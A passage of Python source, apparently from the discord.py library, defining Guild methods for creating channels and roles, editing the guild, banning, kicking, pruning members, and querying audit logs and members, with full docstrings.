Returns
--------
Optional[:class:`Member`]
The member in this guild with the associated name. If not found
then ``None`` is returned.
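Example
--------
A lookup sketch (the names are hypothetical): ::
    member = guild.get_member_named('Jake#0001')
    if member is None:
        member = guild.get_member_named('Jake')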
"""
result = None
members = self.members
if len(name) > 5 and name[-5] == '#':
# The 5 length is checking to see if #0000 is in the string,
# as a#0000 has a length of 6, the minimum for a potential
# discriminator lookup.
potential_discriminator = name[-4:]
# do the actual lookup and return if found
# if it isn't found then we'll do a full name lookup below.
result = utils.get(members, name=name[:-5], discriminator=potential_discriminator)
if result is not None:
return result
def pred(m):
return m.nick == name or m.name == name
return utils.find(pred, members)
def _create_channel(self, name, overwrites, channel_type, category=None, **options):
if overwrites is None:
overwrites = {}
elif not isinstance(overwrites, dict):
raise InvalidArgument('overwrites parameter expects a dict.')
perms = []
for target, perm in overwrites.items():
if not isinstance(perm, PermissionOverwrite):
raise InvalidArgument(f'Expected PermissionOverwrite received {perm.__class__.__name__}')
allow, deny = perm.pair()
payload = {
'allow': allow.value,
'deny': deny.value,
'id': target.id
}
if isinstance(target, Role):
payload['type'] = abc._Overwrites.ROLE
else:
payload['type'] = abc._Overwrites.MEMBER
perms.append(payload)
try:
options['rate_limit_per_user'] = options.pop('slowmode_delay')
except KeyError:
pass
try:
rtc_region = options.pop('rtc_region')
except KeyError:
pass
else:
options['rtc_region'] = None if rtc_region is None else str(rtc_region)
parent_id = category.id if category else None
return self._state.http.create_channel(self.id, channel_type.value, name=name, parent_id=parent_id,
permission_overwrites=perms, **options)
async def create_text_channel(self, name, *, overwrites=None, category=None, reason=None, **options):
"""|coro|
Creates a :class:`TextChannel` for the guild.
Note that you need the :attr:`~Permissions.manage_channels` permission
to create the channel.
The ``overwrites`` parameter can be used to create a 'secret'
channel upon creation. This parameter expects a :class:`dict` of
overwrites with the target (either a :class:`Member` or a :class:`Role`)
as the key and a :class:`PermissionOverwrite` as the value.
.. note::
Creating a channel of a specified position will not update the position of
other channels to follow suit. A follow-up call to :meth:`~TextChannel.edit`
will be required to update the position of the channel in the channel list.
Examples
----------
Creating a basic channel:
.. code-block:: python3
channel = await guild.create_text_channel('cool-channel')
Creating a "secret" channel:
.. code-block:: python3
overwrites = {
guild.default_role: discord.PermissionOverwrite(read_messages=False),
guild.me: discord.PermissionOverwrite(read_messages=True)
}
channel = await guild.create_text_channel('secret', overwrites=overwrites)
Parameters
-----------
name: :class:`str`
The channel's name.
overwrites
A :class:`dict` of target (either a role or a member) to
:class:`PermissionOverwrite` to apply upon creation of a channel.
Useful for creating secret channels.
category: Optional[:class:`CategoryChannel`]
The category to place the newly created channel under.
The permissions will be automatically synced to category if no
overwrites are provided.
position: :class:`int`
The position in the channel list. This is a number that starts
at 0. e.g. the top channel is position 0.
topic: Optional[:class:`str`]
The new channel's topic.
slowmode_delay: :class:`int`
Specifies the slowmode rate limit for users in this channel, in seconds.
The maximum value possible is `21600`.
nsfw: :class:`bool`
To mark the channel as NSFW or not.
reason: Optional[:class:`str`]
The reason for creating this channel. Shows up on the audit log.
Raises
-------
Forbidden
You do not have the proper permissions to create this channel.
HTTPException
Creating the channel failed.
InvalidArgument
The permission overwrite information is not in proper form.
Returns
-------
:class:`TextChannel`
The channel that was just created.
"""
data = await self._create_channel(name, overwrites, ChannelType.text, category, reason=reason, **options)
channel = TextChannel(state=self._state, guild=self, data=data)
# temporarily add to the cache
self._channels[channel.id] = channel
return channel
async def create_voice_channel(self, name, *, overwrites=None, category=None, reason=None, **options):
"""|coro|
This is similar to :meth:`create_text_channel` except it makes a :class:`VoiceChannel` instead, in addition
to having the following new parameters.
Parameters
-----------
bitrate: :class:`int`
The channel's preferred audio bitrate in bits per second.
user_limit: :class:`int`
The channel's limit for number of members that can be in a voice channel.
rtc_region: Optional[:class:`VoiceRegion`]
The region for the voice channel's voice communication.
A value of ``None`` indicates automatic voice region detection.
.. versionadded:: 1.7
Raises
------
Forbidden
You do not have the proper permissions to create this channel.
HTTPException
Creating the channel failed.
InvalidArgument
The permission overwrite information is not in proper form.
Returns
-------
:class:`VoiceChannel`
The channel that was just created.
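Example
--------
A usage sketch; the name and settings are illustrative: ::
    channel = await guild.create_voice_channel('General', bitrate=96000, user_limit=10)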
"""
data = await self._create_channel(name, overwrites, ChannelType.voice, category, reason=reason, **options)
channel = VoiceChannel(state=self._state, guild=self, data=data)
# temporarily add to the cache
self._channels[channel.id] = channel
return channel
async def create_stage_channel(self, name, *, topic=None, category=None, overwrites=None, reason=None, position=None):
"""|coro|
This is similar to :meth:`create_text_channel` except it makes a :class:`StageChannel` instead.
.. note::
The ``slowmode_delay`` and ``nsfw`` parameters are not supported in this function.
.. versionadded:: 1.7
Raises
------
Forbidden
You do not have the proper permissions to create this channel.
HTTPException
Creating the channel failed.
InvalidArgument
The permission overwrite information is not in proper form.
Returns
-------
:class:`StageChannel`
The channel that was just created.
"""
data = await self._create_channel(name, overwrites, ChannelType.stage_voice, category, reason=reason, position=position, topic=topic)
channel = StageChannel(state=self._state, guild=self, data=data)
# temporarily add to the cache
self._channels[channel.id] = channel
return channel
async def create_category(self, name, *, overwrites=None, reason=None, position=None):
"""|coro|
Same as :meth:`create_text_channel` except it makes a :class:`CategoryChannel` instead.
.. note::
The ``category`` parameter is not supported in this function since categories
cannot have categories.
Raises
------
Forbidden
You do not have the proper permissions to create this channel.
HTTPException
Creating the channel failed.
InvalidArgument
The permission overwrite information is not in proper form.
Returns
-------
:class:`CategoryChannel`
The channel that was just created.
"""
data = await self._create_channel(name, overwrites, ChannelType.category, reason=reason, position=position)
channel = CategoryChannel(state=self._state, guild=self, data=data)
# temporarily add to the cache
self._channels[channel.id] = channel
return channel
create_category_channel = create_category
async def leave(self):
"""|coro|
Leaves the guild.
.. note::
You cannot leave the guild that you own, you must delete it instead
via :meth:`delete`.
Raises
--------
HTTPException
Leaving the guild failed.
"""
await self._state.http.leave_guild(self.id)
async def delete(self):
"""|coro|
Deletes the guild. You must be the guild owner to delete the
guild.
Raises
--------
HTTPException
Deleting the guild failed.
Forbidden
You do not have permissions to delete the guild.
"""
await self._state.http.delete_guild(self.id)
async def edit(self, *, reason=None, **fields):
"""|coro|
Edits the guild.
You must have the :attr:`~Permissions.manage_guild` permission
to edit the guild.
.. versionchanged:: 1.4
The `rules_channel` and `public_updates_channel` keyword-only parameters were added.
Parameters
----------
name: :class:`str`
The new name of the guild.
description: :class:`str`
The new description of the guild. This is only available to guilds that
contain ``PUBLIC`` in :attr:`Guild.features`.
icon: :class:`bytes`
A :term:`py:bytes-like object` representing the icon. Only PNG/JPEG is supported.
GIF is only available to guilds that contain ``ANIMATED_ICON`` in :attr:`Guild.features`.
Could be ``None`` to denote removal of the icon.
banner: :class:`bytes`
A :term:`py:bytes-like object` representing the banner.
Could be ``None`` to denote removal of the banner.
splash: :class:`bytes`
A :term:`py:bytes-like object` representing the invite splash.
Only PNG/JPEG supported. Could be ``None`` to denote removing the
splash. This is only available to guilds that contain ``INVITE_SPLASH``
in :attr:`Guild.features`.
region: :class:`VoiceRegion`
The new region for the guild's voice communication.
afk_channel: Optional[:class:`VoiceChannel`]
The new channel that is the AFK channel. Could be ``None`` for no AFK channel.
afk_timeout: :class:`int`
The number of seconds until someone is moved to the AFK channel.
owner: :class:`Member`
The new owner of the guild to transfer ownership to. Note that you must
be owner of the guild to do this.
verification_level: :class:`VerificationLevel`
The new verification level for the guild.
default_notifications: :class:`NotificationLevel`
The new default notification level for the guild.
explicit_content_filter: :class:`ContentFilter`
The new explicit content filter for the guild.
vanity_code: :class:`str`
The new vanity code for the guild.
system_channel: Optional[:class:`TextChannel`]
The new channel that is used for the system channel. Could be ``None`` for no system channel.
system_channel_flags: :class:`SystemChannelFlags`
The new system channel settings to use with the new system channel.
preferred_locale: :class:`str`
The new preferred locale for the guild. Used as the primary language in the guild.
If set, this must be an ISO 639 code, e.g. ``en-US`` or ``ja`` or ``zh-CN``.
rules_channel: Optional[:class:`TextChannel`]
The new channel that is used for rules. This is only available to
guilds that contain ``PUBLIC`` in :attr:`Guild.features`. Could be ``None`` for no rules
channel.
public_updates_channel: Optional[:class:`TextChannel`]
The new channel that is used for public updates from Discord. This is only available to
guilds that contain ``PUBLIC`` in :attr:`Guild.features`. Could be ``None`` for no
public updates channel.
reason: Optional[:class:`str`]
The reason for editing this guild. Shows up on the audit log.
Raises
-------
Forbidden
You do not have permissions to edit the guild.
HTTPException
Editing the guild failed.
InvalidArgument
The image format passed in to ``icon`` is invalid. It must be
PNG or JPG. This is also raised if you are not the owner of the
guild and request an ownership transfer.
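Example
--------
A usage sketch (the values are illustrative and assume the ``discord``
namespace is imported): ::
    await guild.edit(name='New Name',
                     verification_level=discord.VerificationLevel.high,
                     reason='Tightening up moderation')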
"""
http = self._state.http
try:
icon_bytes = fields['icon']
except KeyError:
icon = self.icon
else:
if icon_bytes is not None:
icon = utils._bytes_to_base64_data(icon_bytes)
else:
icon = None
try:
banner_bytes = fields['banner']
except KeyError:
banner = self.banner
else:
if banner_bytes is not None:
banner = utils._bytes_to_base64_data(banner_bytes)
else:
banner = None
try:
vanity_code = fields['vanity_code']
except KeyError:
pass
else:
await http.change_vanity_code(self.id, vanity_code, reason=reason)
try:
splash_bytes = fields['splash']
except KeyError:
splash = self.splash
else:
if splash_bytes is not None:
splash = utils._bytes_to_base64_data(splash_bytes)
else:
splash = None
fields['icon'] = icon
fields['banner'] = banner
fields['splash'] = splash
default_message_notifications = fields.get('default_notifications', self.default_notifications)
if not isinstance(default_message_notifications, NotificationLevel):
raise InvalidArgument('default_notifications field must be of type NotificationLevel')
fields['default_message_notifications'] = default_message_notifications.value
try:
afk_channel = fields.pop('afk_channel')
except KeyError:
pass
else:
if afk_channel is None:
fields['afk_channel_id'] = afk_channel
else:
fields['afk_channel_id'] = afk_channel.id
try:
system_channel = fields.pop('system_channel')
except KeyError:
pass
else:
if system_channel is None:
fields['system_channel_id'] = system_channel
else:
fields['system_channel_id'] = system_channel.id
if 'owner' in fields:
if self.owner_id != self._state.self_id:
raise InvalidArgument('To transfer ownership you must be the owner of the guild.')
fields['owner_id'] = fields['owner'].id
if 'region' in fields:
fields['region'] = str(fields['region'])
level = fields.get('verification_level', self.verification_level)
if not isinstance(level, VerificationLevel):
raise InvalidArgument('verification_level field must be of type VerificationLevel')
fields['verification_level'] = level.value
explicit_content_filter = fields.get('explicit_content_filter', self.explicit_content_filter)
if not isinstance(explicit_content_filter, ContentFilter):
raise InvalidArgument('explicit_content_filter field must be of type ContentFilter')
fields['explicit_content_filter'] = explicit_content_filter.value
system_channel_flags = fields.get('system_channel_flags', self.system_channel_flags)
if not isinstance(system_channel_flags, SystemChannelFlags):
raise InvalidArgument('system_channel_flags field must be of type SystemChannelFlags')
fields['system_channel_flags'] = system_channel_flags.value
try:
rules_channel = fields.pop('rules_channel')
except KeyError:
pass
else:
if rules_channel is None:
fields['rules_channel_id'] = rules_channel
else:
fields['rules_channel_id'] = rules_channel.id
try:
public_updates_channel = fields.pop('public_updates_channel')
except KeyError:
pass
else:
if public_updates_channel is None:
fields['public_updates_channel_id'] = public_updates_channel
else:
fields['public_updates_channel_id'] = public_updates_channel.id
await http.edit_guild(self.id, reason=reason, **fields)
async def fetch_channels(self):
"""|coro|
Retrieves all :class:`abc.GuildChannel` that the guild has.
.. note::
This method is an API call. For general usage, consider :attr:`channels` instead.
.. versionadded:: 1.2
Raises
-------
InvalidData
An unknown channel type was received from Discord.
HTTPException
Retrieving the channels failed.
Returns
-------
List[:class:`abc.GuildChannel`]
All channels in the guild.
"""
data = await self._state.http.get_all_guild_channels(self.id)
def convert(d):
factory, ch_type = _channel_factory(d['type'])
if factory is None:
raise InvalidData('Unknown channel type {type} for channel ID {id}.'.format_map(d))
channel = factory(guild=self, state=self._state, data=d)
return channel
return [convert(d) for d in data]
def fetch_members(self, *, limit=1000, after=None):
"""Retrieves an :class:`.AsyncIterator` that enables receiving the guild's members. In order to use this,
:meth:`Intents.members` must be enabled.
.. note::
This method is an API call. For general usage, consider :attr:`members` instead.
.. versionadded:: 1.3
All parameters are optional.
Parameters
----------
limit: Optional[:class:`int`]
The number of members to retrieve. Defaults to 1000.
Pass ``None`` to fetch all members. Note that this is potentially slow.
after: Optional[Union[:class:`.abc.Snowflake`, :class:`datetime.datetime`]]
Retrieve members after this date or object.
If a datetime is provided, it is recommended to use a UTC aware datetime.
If the datetime is naive, it is assumed to be local time.
Raises
------
ClientException
The members intent is not enabled.
HTTPException
Getting the members failed.
Yields
------
:class:`.Member`
The member with the member data parsed.
Examples
--------
Usage ::
async for member in guild.fetch_members(limit=150):
print(member.name)
Flattening into a list ::
members = await guild.fetch_members(limit=150).flatten()
# members is now a list of Member...
"""
if not self._state._intents.members:
raise ClientException('Intents.members must be enabled to use this.')
return MemberIterator(self, limit=limit, after=after)
async def fetch_member(self, member_id):
"""|coro|
Retrieves a :class:`Member` from a guild ID, and a member ID.
.. note::
This method is an API call. For general usage, consider :meth:`get_member` instead.
Parameters
-----------
member_id: :class:`int`
The member's ID to fetch from.
Raises
-------
Forbidden
You do not have access to the guild.
HTTPException
Fetching the member failed.
Returns
--------
:class:`Member`
The member from the member ID.
"""
data = await self._state.http.get_member(self.id, member_id)
return Member(data=data, state=self._state, guild=self)
async def fetch_ban(self, user):
"""|coro|
Retrieves the :class:`BanEntry` for a user.
You must have the :attr:`~Permissions.ban_members` permission
to get this information.
Parameters
-----------
user: :class:`abc.Snowflake`
The user to get ban information from.
Raises
------
Forbidden
You do not have proper permissions to get the information.
NotFound
This user is not banned.
HTTPException
An error occurred while fetching the information.
Returns
-------
:class:`BanEntry`
The :class:`BanEntry` object for the specified user.
"""
data: BanPayload = await self._state.http.get_ban(user.id, self.id)
return BanEntry(
user=User(state=self._state, data=data['user']),
reason=data['reason']
)
async def bans(self):
"""|coro|
Retrieves all the users that are banned from the guild as a :class:`list` of :class:`BanEntry`.
You must have the :attr:`~Permissions.ban_members` permission
to get this information.
Raises
-------
Forbidden
You do not have proper permissions to get the information.
HTTPException
An error occurred while fetching the information.
Returns
--------
List[:class:`BanEntry`]
A list of :class:`BanEntry` objects.
"""
data: List[BanPayload] = await self._state.http.get_bans(self.id)
return [BanEntry(user=User(state=self._state, data=e['user']),
reason=e['reason'])
for e in data]
async def prune_members(self, *, days, compute_prune_count=True, roles=None, reason=None):
r"""|coro|
Prunes the guild of its inactive members.
A member is considered inactive if they have not logged on in
``days`` days and they have no roles.
You must have the :attr:`~Permissions.kick_members` permission
to use this.
To check how many members you would prune without actually pruning,
see the :meth:`estimate_pruned_members` function.
To prune members that have specific roles see the ``roles`` parameter.
.. versionchanged:: 1.4
The ``roles`` keyword-only parameter was added.
Parameters
-----------
days: :class:`int`
The number of days before counting as inactive.
reason: Optional[:class:`str`]
The reason for doing this action. Shows up on the audit log.
compute_prune_count: :class:`bool`
Whether to compute the prune count. This defaults to ``True``
which makes it prone to timeouts in very large guilds. In order
to prevent timeouts, you must set this to ``False``. If this is
set to ``False``\, then this function will always return ``None``.
roles: Optional[List[:class:`abc.Snowflake`]]
A list of :class:`abc.Snowflake` that represent roles to include in the pruning process. If a member
has a role that is not specified, they'll be excluded.
Raises
-------
Forbidden
You do not have permissions to prune members.
HTTPException
An error occurred while pruning members.
InvalidArgument
An integer was not passed for ``days``.
Returns
---------
Optional[:class:`int`]
The number of members pruned. If ``compute_prune_count`` is ``False``
then this returns ``None``.
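Example
--------
A usage sketch: ::
    pruned = await guild.prune_members(days=30, reason='Inactivity sweep')
    print(f'Pruned {pruned} members.')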
"""
if not isinstance(days, int):
raise InvalidArgument(f'Expected int for ``days``, received {days.__class__.__name__} instead.')
if roles:
roles = [str(role.id) for role in roles]
data = await self._state.http.prune_members(self.id, days, compute_prune_count=compute_prune_count, roles=roles, reason=reason)
return data['pruned']
async def templates(self):
"""|coro|
Gets the list of templates from this guild.
Requires :attr:`~.Permissions.manage_guild` permissions.
.. versionadded:: 1.7
Raises
-------
Forbidden
You don't have permissions to get the templates.
Returns
--------
List[:class:`Template`]
The templates for this guild.
"""
from .template import Template
data = await self._state.http.guild_templates(self.id)
return [Template(data=d, state=self._state) for d in data]
async def webhooks(self):
"""|coro|
Gets the list of webhooks from this guild.
Requires :attr:`~.Permissions.manage_webhooks` permissions.
Raises
-------
Forbidden
You don't have permissions to get the webhooks.
Returns
--------
List[:class:`Webhook`]
The webhooks for this guild.
"""
from .webhook import Webhook
data = await self._state.http.guild_webhooks(self.id)
return [Webhook.from_state(d, state=self._state) for d in data]
async def estimate_pruned_members(self, *, days, roles=None):
"""|coro|
Similar to :meth:`prune_members` except instead of actually
pruning members, it returns how many members it would prune
from the guild had it been called.
Parameters
-----------
days: :class:`int`
The number of days before counting as inactive.
roles: Optional[List[:class:`abc.Snowflake`]]
A list of :class:`abc.Snowflake` that represent roles to include in the estimate. If a member
has a role that is not specified, they'll be excluded.
.. versionadded:: 1.7
Raises
-------
Forbidden
You do not have permissions to prune members.
HTTPException
An error occurred while fetching the prune members estimate.
InvalidArgument
An integer was not passed for ``days``.
Returns
---------
:class:`int`
The number of members estimated to be pruned.
"""
if not isinstance(days, int):
raise InvalidArgument(f'Expected int for ``days``, received {days.__class__.__name__} instead.')
if roles:
roles = [str(role.id) for role in roles]
data = await self._state.http.estimate_pruned_members(self.id, days, roles)
return data['pruned']
async def invites(self) -> List[Invite]:
"""|coro|
Returns a list of all active instant invites from the guild.
You must have the :attr:`~Permissions.manage_guild` permission to get
this information.
Raises
-------
Forbidden
You do not have proper permissions to get the information.
HTTPException
An error occurred while fetching the information.
Returns
-------
List[:class:`Invite`]
The list of invites that are currently active.
"""
data = await self._state.http.invites_from(self.id)
result = []
for invite in data:
channel = self.get_channel(int(invite['channel']['id']))
invite['channel'] = channel
invite['guild'] = self
result.append(Invite(state=self._state, data=invite))
return result
async def create_template(self, *, name, description=None):
"""|coro|
Creates a template for the guild.
You must have the :attr:`~Permissions.manage_guild` permission to
do this.
.. versionadded:: 1.7
Parameters
-----------
name: :class:`str`
The name of the template.
description: Optional[:class:`str`]
The description of the template.
"""
from .template import Template
payload = {
'name': name
}
if description:
payload['description'] = description
data = await self._state.http.create_template(self.id, payload)
return Template(state=self._state, data=data)
async def create_integration(self, *, type, id):
"""|coro|
Attaches an integration to the guild.
You must have the :attr:`~Permissions.manage_guild` permission to
do this.
.. versionadded:: 1.4
Parameters
-----------
type: :class:`str`
The integration type (e.g. Twitch).
id: :class:`int`
The integration ID.
Raises
-------
Forbidden
You do not have permission to create the integration.
HTTPException
The account could not be found.
"""
await self._state.http.create_integration(self.id, type, id)
async def integrations(self):
"""|coro|
Returns a list of all integrations attached to the guild.
You must have the :attr:`~Permissions.manage_guild` permission to
do this.
.. versionadded:: 1.4
Raises
-------
Forbidden
You do not have permission to fetch the integrations.
HTTPException
Fetching the integrations failed.
Returns
--------
List[:class:`Integration`]
The list of integrations that are attached to the guild.
"""
data = await self._state.http.get_all_integrations(self.id)
return [Integration(guild=self, data=d) for d in data]
async def fetch_emojis(self):
r"""|coro|
Retrieves all custom :class:`Emoji`\s from the guild.
.. note::
This method is an API call. For general usage, consider :attr:`emojis` instead.
Raises
---------
HTTPException
An error occurred fetching the emojis.
Returns
--------
List[:class:`Emoji`]
The retrieved emojis.
"""
data = await self._state.http.get_all_custom_emojis(self.id)
return [Emoji(guild=self, state=self._state, data=d) for d in data]
async def fetch_emoji(self, emoji_id):
"""|coro|
Retrieves a custom :class:`Emoji` from the guild.
.. note::
This method is an API call.
For general usage, consider iterating over :attr:`emojis` instead.
Parameters
-------------
emoji_id: :class:`int`
The emoji's ID.
Raises
---------
NotFound
The emoji requested could not be found.
HTTPException
An error occurred fetching the emoji.
Returns
--------
:class:`Emoji`
The retrieved emoji.
"""
data = await self._state.http.get_custom_emoji(self.id, emoji_id)
return Emoji(guild=self, state=self._state, data=data)
async def create_custom_emoji(self, *, name, image, roles=None, reason=None):
r"""|coro|
Creates a custom :class:`Emoji` for the guild.
There is currently a limit of 50 static and animated emojis respectively per guild,
unless the guild has the ``MORE_EMOJI`` feature which extends the limit to 200.
You must have the :attr:`~Permissions.manage_emojis` permission to
do this.
Parameters
-----------
name: :class:`str`
The emoji name. Must be at least 2 characters.
image: :class:`bytes`
The :term:`py:bytes-like object` representing the image data to use.
Only JPG, PNG and GIF images are supported.
roles: Optional[List[:class:`Role`]]
A :class:`list` of :class:`Role`\s that can use this emoji. Leave empty to make it available to everyone.
reason: Optional[:class:`str`]
The reason for creating this emoji. Shows up on the audit log.
Raises
-------
Forbidden
You are not allowed to create emojis.
HTTPException
An error occurred creating an emoji.
Returns
--------
:class:`Emoji`
The created emoji.
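Example
--------
A usage sketch; ``emoji.png`` is a hypothetical local file: ::
    with open('emoji.png', 'rb') as fp:
        emoji = await guild.create_custom_emoji(name='thonk', image=fp.read())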
"""
img = utils._bytes_to_base64_data(image)
if roles:
roles = [role.id for role in roles]
data = await self._state.http.create_custom_emoji(self.id, name, img, roles=roles, reason=reason)
return self._state.store_emoji(self, data)
async def fetch_roles(self):
"""|coro|
Retrieves all :class:`Role` that the guild has.
.. note::
This method is an API call. For general usage, consider :attr:`roles` instead.
.. versionadded:: 1.3
Raises
-------
HTTPException
Retrieving the roles failed.
Returns
-------
List[:class:`Role`]
All roles in the guild.
"""
data = await self._state.http.get_roles(self.id)
return [Role(guild=self, state=self._state, data=d) for d in data]
async def create_role(self, *, reason=None, **fields):
"""|coro|
Creates a :class:`Role` for the guild.
All fields are optional.
You must have the :attr:`~Permissions.manage_roles` permission to
do this.
.. versionchanged:: 1.6
Can now pass ``int`` to ``colour`` keyword-only parameter.
Parameters
-----------
name: :class:`str`
The role name. Defaults to 'new role'.
permissions: :class:`Permissions`
The permissions to have. Defaults to no permissions.
colour: Union[:class:`Colour`, :class:`int`]
The colour for the role. Defaults to :meth:`Colour.default`.
This is aliased to ``color`` as well.
hoist: :class:`bool`
Indicates if the role should be shown separately in the member list.
Defaults to ``False``.
mentionable: :class:`bool`
Indicates if the role should be mentionable by others.
Defaults to ``False``.
reason: Optional[:class:`str`]
The reason for creating this role. Shows up on the audit log.
Raises
-------
Forbidden
You do not have permissions to create the role.
HTTPException
Creating the role failed.
InvalidArgument
An invalid keyword argument was given.
Returns
--------
:class:`Role`
The newly created role.
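Example
--------
A usage sketch (the values are illustrative and assume the ``discord``
namespace is imported): ::
    role = await guild.create_role(name='Moderator', hoist=True,
                                   colour=discord.Colour.blue(),
                                   reason='Setting up the mod team')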
"""
try:
perms = fields.pop('permissions')
except KeyError:
fields['permissions'] = '0'
else:
fields['permissions'] = str(perms.value)
try:
colour = fields.pop('colour')
except KeyError:
colour = fields.get('color', Colour.default())
finally:
if isinstance(colour, int):
colour = Colour(value=colour)
fields['color'] = colour.value
valid_keys = ('name', 'permissions', 'color', 'hoist', 'mentionable')
for key in fields:
if key not in valid_keys:
raise InvalidArgument(f'{key!r} is not a valid field.')
data = await self._state.http.create_role(self.id, reason=reason, **fields)
role = Role(guild=self, data=data, state=self._state)
# TODO: add to cache
return role
async def edit_role_positions(self, positions, *, reason=None):
"""|coro|
Bulk edits a list of :class:`Role` in the guild.
You must have the :attr:`~Permissions.manage_roles` permission to
do this.
.. versionadded:: 1.4
Example:
.. code-block:: python3
positions = {
bots_role: 1, # penultimate role
tester_role: 2,
admin_role: 6
}
await guild.edit_role_positions(positions=positions)
Parameters
-----------
positions
A :class:`dict` of :class:`Role` to :class:`int` to change the positions
of each given role.
reason: Optional[:class:`str`]
The reason for editing the role positions. Shows up on the audit log.
Raises
-------
Forbidden
You do not have permissions to move the roles.
HTTPException
Moving the roles failed.
InvalidArgument
An invalid keyword argument was given.
Returns
--------
List[:class:`Role`]
A list of all the roles in the guild.
"""
if not isinstance(positions, dict):
raise InvalidArgument('positions parameter expects a dict.')
role_positions = []
for role, position in positions.items():
payload = {
'id': role.id,
'position': position
}
role_positions.append(payload)
data = await self._state.http.move_role_position(self.id, role_positions, reason=reason)
roles = []
for d in data:
role = Role(guild=self, data=d, state=self._state)
roles.append(role)
self._roles[role.id] = role
return roles
async def kick(self, user, *, reason=None):
"""|coro|
Kicks a user from the guild.
The user must meet the :class:`abc.Snowflake` abc.
You must have the :attr:`~Permissions.kick_members` permission to
do this.
Parameters
-----------
user: :class:`abc.Snowflake`
The user to kick from their guild.
reason: Optional[:class:`str`]
The reason the user got kicked.
Raises
-------
Forbidden
You do not have the proper permissions to kick.
HTTPException
Kicking failed.
"""
await self._state.http.kick(user.id, self.id, reason=reason)
async def ban(self, user, *, reason=None, delete_message_days=1):
"""|coro|
Bans a user from the guild.
The user must meet the :class:`abc.Snowflake` abc.
You must have the :attr:`~Permissions.ban_members` permission to
do this.
Parameters
-----------
user: :class:`abc.Snowflake`
The user to ban from their guild.
delete_message_days: :class:`int`
The number of days worth of messages to delete from the user
in the guild. The minimum is 0 and the maximum is 7.
reason: Optional[:class:`str`]
The reason the user got banned.
Raises
-------
Forbidden
You do not have the proper permissions to ban.
HTTPException
Banning failed.
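Example
--------
A usage sketch; ``member`` is assumed to be any :class:`abc.Snowflake`: ::
    await guild.ban(member, reason='Spam', delete_message_days=7)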
"""
await self._state.http.ban(user.id, self.id, delete_message_days, reason=reason)
async def unban(self, user, *, reason=None):
"""|coro|
Unbans a user from the guild.
The user must meet the :class:`abc.Snowflake` abc.
You must have the :attr:`~Permissions.ban_members` permission to
do this.
Parameters
-----------
user: :class:`abc.Snowflake`
The user to unban.
reason: Optional[:class:`str`]
The reason for doing this action. Shows up on the audit log.
Raises
-------
Forbidden
You do not have the proper permissions to unban.
HTTPException
Unbanning failed.
"""
await self._state.http.unban(user.id, self.id, reason=reason)
async def vanity_invite(self) -> Invite:
"""|coro|
Returns the guild's special vanity invite.
The guild must have ``VANITY_URL`` in :attr:`~Guild.features`.
You must have the :attr:`~Permissions.manage_guild` permission to use
this as well.
Raises
-------
Forbidden
You do not have the proper permissions to get this.
HTTPException
Retrieving the vanity invite failed.
Returns
--------
:class:`Invite`
The special vanity invite.
"""
# we start with { code: abc }
payload = await self._state.http.get_vanity_code(self.id)
# get the vanity URL channel since default channels aren't
# reliable or a thing anymore
data = await self._state.http.get_invite(payload['code'])
payload['guild'] = self
payload['channel'] = self.get_channel(int(data['channel']['id']))
payload['revoked'] = False
payload['temporary'] = False
payload['max_uses'] = 0
payload['max_age'] = 0
return Invite(state=self._state, data=payload)
def audit_logs(self, *, limit=100, before=None, after=None, oldest_first=None, user=None, action=None):
"""Returns an :class:`AsyncIterator` that enables receiving the guild's audit logs.
You must have the :attr:`~Permissions.view_audit_log` permission to use this.
Examples
----------
Getting the first 100 entries: ::
async for entry in guild.audit_logs(limit=100):
print(f'{entry.user} did {entry.action} to {entry.target}')
Getting entries for a specific action: ::
async for entry in guild.audit_logs(action=discord.AuditLogAction.ban):
print(f'{entry.user} banned {entry.target}')
Getting entries made by a specific user: ::
entries = await guild.audit_logs(limit=None, user=guild.me).flatten()
await channel.send(f'I made {len(entries)} moderation actions.')
Parameters
-----------
limit: Optional[:class:`int`]
The number of entries to retrieve. If ``None`` retrieve all entries.
before: Union[:class:`abc.Snowflake`, :class:`datetime.datetime`]
Retrieve entries before this date or entry.
If a datetime is provided, it is recommended to use a UTC aware datetime.
If the datetime is naive, it is assumed to be local time.
after: Union[:class:`abc.Snowflake`, :class:`datetime.datetime`]
Retrieve entries after this date or entry.
If a datetime is provided, it is recommended to use a UTC aware datetime.
If the datetime is naive, it is assumed to be local time.
oldest_first: :class:`bool`
If set to ``True``, return entries in oldest->newest order. Defaults to ``True`` if
``after`` is specified, otherwise ``False``.
user: :class:`abc.Snowflake`
The moderator to filter entries from.
action: :class:`AuditLogAction`
The action to filter with.
Raises
-------
Forbidden
You are not allowed to fetch audit logs.
HTTPException
An error occurred while fetching the audit logs.
Yields
--------
:class:`AuditLogEntry`
The audit log entry.
"""
if user:
user = user.id
if action:
action = action.value
return AuditLogIterator(self, before=before, after=after, limit=limit,
oldest_first=oldest_first, user_id=user, action_type=action)
async def widget(self):
"""|coro|
Returns the widget of the guild.
.. note::
The guild must have the widget enabled to get this information.
Raises
-------
Forbidden
The widget for this guild is disabled.
HTTPException
Retrieving the widget failed.
Returns
--------
:class:`Widget`
The guild's widget.
"""
data = await self._state.http.get_widget(self.id)
return Widget(state=self._state, data=data)
async def chunk(self, *, cache=True):
"""|coro|
Requests all members that belong to this guild. In order to use this,
:meth:`Intents.members` must be enabled.
This is a websocket operation and can be slow.
.. versionadded:: 1.5
Parameters
-----------
cache: :class:`bool`
Whether to cache the members as well.
Raises
-------
ClientException
The members intent is not enabled.
"""
if not self._state._intents.members:
raise ClientException('Intents.members must be enabled to use this.')
return await self._state.chunk_guild(self, cache=cache)
async def query_members(self, query=None, *, limit=5, user_ids=None, presences=False, cache=True):
"""|coro|
Request members that belong to this guild whose username starts with
the query given.
This is a websocket operation and can be slow.
.. versionadded:: 1.3
Parameters
-----------
query: Optional[:class:`str`]
The string that the usernames start with.
limit: :class:`int`
The maximum number of members to send back. This must be
a number between 5 and 100.
presences: :class:`bool`
Whether to request for presences to be provided. This defaults
to ``False``.
.. versionadded:: 1.6
cache: :class:`bool`
Whether to cache the members internally. This makes operations
such as :meth:`get_member` work for those that matched.
user_ids: Optional[List[:class:`int`]]
List of user IDs to search for. If the user ID is not in the guild then it won't be returned.
.. versionadded:: 1.4
Raises
-------
asyncio.TimeoutError
The query timed out waiting for the members.
ValueError
Invalid parameters were passed to the function
ClientException
The presences intent is not enabled.
Returns
--------
List[:class:`Member`]
The list of members that have matched the query.
"""
if presences and not self._state._intents.presences:
raise ClientException('Intents.presences must be enabled to use this.')
if query == '':
raise ValueError('Cannot pass empty query string.')
if query is None and user_ids is None:
raise ValueError('Must pass either query or user_ids')
